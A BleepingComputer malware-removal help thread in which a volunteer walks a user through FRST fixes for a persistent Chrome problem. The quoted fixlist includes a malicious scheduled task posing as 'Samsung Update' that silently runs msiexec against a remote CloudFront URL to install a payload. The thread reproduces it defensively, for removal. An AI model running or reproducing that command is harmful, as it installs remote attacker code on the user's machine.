Posted 28 April 2017 - 09:13 PM
Posted 28 April 2017 - 10:33 PM
After running some programs before here are the logs from them. I will also note that it seems that when I click my Chrome shortcut in the taskbar, it opens up a new instance of chrome which is not pinned on the taskbar. Reinstaling chrome will fix this unitl a restart where it will do this again.
Edited by 1dj, 28 April 2017 - 10:38 PM.
Posted 29 April 2017 - 08:33 AM
Start CreateRestorePoint: EmptyTemp: CloseProcesses: HKU\S-1-5-21-2833979337-2780947661-2915321693-1001\...\Run: [Windows Defender] => - ShellExecuteHooks: No Name - {A950E7F8-2366-11E7-B493-64006A5CFC23} - C:\Users\danie\AppData\Roaming\Anerliphgricied\Pherrasy.dll -> No File CHR Profile: C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-29] <==== ATTENTION CHR Extension: (EditThisCookie) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2016-12-08] CHR Extension: (Popup Blocker Pro) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kiodaajmphnkcajieajajinghpejdjai [2017-01-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12] CHR Extension: (Chrome Media Router) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-26] S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [X] S2 HKClipSvc; C:\Program Files (x86)\Hotkey\Driver\x64\HKClipSvc.exe [X] R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S2 PowerBiosServer; "C:\Program Files (x86)\Hotkey\HotkeyService.exe" [X] Task: {03244A71-F0F7-4EEE-9B53-74CF550632A6} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION Task: {5BBC0DE0-3D6D-43D4-A9E3-24D9E7761BF2} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SanDiskXSD8SN8U512G1122_162304427574&d=20170426 /q <==== ATTENTION Task: {6F2AC8EF-04FB-415C-A9A5-C6252B20BA83} - \QMC Reader for VAB -> No File <==== ATTENTION Task: {701B2478-32EB-4392-A59B-E66E1FA91CC9} - \Prezoph -> No File <==== ATTENTION EndSave the file as fixlist.txt in the same folder where the Farbar tool is running from.
Reinstaling chrome will fix this until a restart where it will do this again.
Posted 29 April 2017 - 09:25 AM
Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Press the windows key+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to a new file.
Start CreateRestorePoint: EmptyTemp: CloseProcesses: HKU\S-1-5-21-2833979337-2780947661-2915321693-1001\...\Run: [Windows Defender] => - ShellExecuteHooks: No Name - {A950E7F8-2366-11E7-B493-64006A5CFC23} - C:\Users\danie\AppData\Roaming\Anerliphgricied\Pherrasy.dll -> No File CHR Profile: C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-29] <==== ATTENTION CHR Extension: (EditThisCookie) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2016-12-08] CHR Extension: (Popup Blocker Pro) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kiodaajmphnkcajieajajinghpejdjai [2017-01-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12] CHR Extension: (Chrome Media Router) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-26] S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [X] S2 HKClipSvc; C:\Program Files (x86)\Hotkey\Driver\x64\HKClipSvc.exe [X] R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S2 PowerBiosServer; "C:\Program Files (x86)\Hotkey\HotkeyService.exe" [X] Task: {03244A71-F0F7-4EEE-9B53-74CF550632A6} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION Task: {5BBC0DE0-3D6D-43D4-A9E3-24D9E7761BF2} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SanDiskXSD8SN8U512G1122_162304427574&d=20170426 /q <==== ATTENTION Task: {6F2AC8EF-04FB-415C-A9A5-C6252B20BA83} - \QMC Reader for VAB -> No File <==== ATTENTION Task: {701B2478-32EB-4392-A59B-E66E1FA91CC9} - \Prezoph -> No File <==== ATTENTION EndSave the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.
Run FRST and click Fix only once and wait.
The tool will create a log (Fixlog.txt) please post it to your reply.
===
Reset Chrome...
Open Google Chrome, click on menu iconwhich is located right side top of the google chrome.
Click "Settings" then "Show advanced settings" at the bottom of the screen.
Click "Reset browser settings" button.
Restart Chrome.
===
Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.
You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp
Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/
Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html
How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882
If still present after the update you can remove the old versions of Java via the Control Panel > Programs > Programs and Features.
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
===
Please let me know what problem persists with this computer.
p.s.Reinstaling chrome will fix this until a restart where it will do this again.
Are you Syncing your Chrome account?
That may be the reason that the problem returned.
Hello, thanks a lot for that.
It seems so far good!
Ill let you know how I go and if I still see any issues.
EDIT: Im seeing in my task manager this program called Windows® update with a random process name, is this concerning?
http://i.imgur.com/8DWDDgY.png (This screenshot has a different process name to the random one I saw before)
Edited by 1dj, 29 April 2017 - 09:31 AM.
Posted 30 April 2017 - 08:07 AM
15-04-2017 00:24:54 Windows Update
19-04-2017 00:02:11 Windows Update
22-04-2017 22:52:11 Windows Update
25-04-2017 23:25:19 Windows Update
29-04-2017 00:34:33 Windows Update
Posted 30 April 2017 - 09:47 AM
Ive comepletely reset chrome and uninstalled and reinstalled it and it still is spawning processes which are not pinned to the taskbar about 30 minutes after using it. I havent synced with my accoount so I have no idea whats causing it.
Posted 30 April 2017 - 12:44 PM
Posted 01 May 2017 - 05:44 AM
Posted 01 May 2017 - 07:05 AM
Posted 01 May 2017 - 08:31 AM
Where do I put this? Also [b] ?Lets try two searches, one for the Registry and the other the the files.
For the registry search hit the Registry Search button with
:reg
winsap.dll;snare.msi
Then for the files hit the File Search button with
:file
winsap.dll;snare.msi
Edited by nasdaq, 01 May 2017 - 12:01 PM.
Posted 01 May 2017 - 12:09 PM
Edited by nasdaq, 10 May 2017 - 07:40 AM.
Posted 01 May 2017 - 08:25 PM
There is only the buttons "Look" and "Exit"
Though after putting in the text field here are the results
Posted 02 May 2017 - 07:46 AM
Do you still have problems with the files I was looking for?
What are the remaining issues?
Posted 10 May 2017 - 06:50 AM
Are you still with me?
Yes I am Sorry.
It seems that every 3 days or so Chrome unattaches itself to the pinned process and creates a new process to which I have to repin.
0 members, 0 guests, 0 anonymous users